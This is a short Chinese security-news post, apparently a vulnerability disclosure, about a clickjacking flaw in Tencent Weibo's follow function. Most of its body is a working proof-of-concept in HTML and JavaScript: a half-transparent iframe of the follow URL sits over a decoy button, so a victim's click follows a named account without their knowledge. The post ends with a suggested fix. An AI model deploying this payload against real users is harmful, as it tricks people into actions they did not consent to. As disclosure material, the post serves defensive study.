频道栏目
首页 > 资讯 > 网站安全 > 正文

腾讯微博关注功能点击劫持

13-04-09        来源:[db:作者]  
收藏   我要投稿
腾讯微博关注功能点击劫持漏洞,可以让其它微博用户在不知情的情况下关注你.
 

这个漏洞应该算是对/Article/201301/184404.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看
 

 
<script>
var xx=0;
var yy=0;
window.onload=function (e){
var iframe = document.getElementById('xxx');
iframe.style.left=a.offsetLeft-xx;
iframe.style.top=a.offsetTop-yy;
}
 
</script>
<iframe style="position:absolute;opacity: 0.5;filter:alpha(opacity=50);z-index:1;" id=xxx src="http://follow.v.t.qq.com/index.php?c=follow&a=quick&name=jackmasa&style=4&t=1342759674261&f=0#" WIDTH=100 height=25></iframe>
<br><br></br><br></br><br></br><center><button id=a>我勒个去</button></center>

 
修复方案:

加confirm确认框.
 
 
 
为什么我觉得腾讯不会修复这个漏洞? 
 
相关TAG标签
上一篇:linux下mysql集群搭建
下一篇:一个安全删除文件的shell命令
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站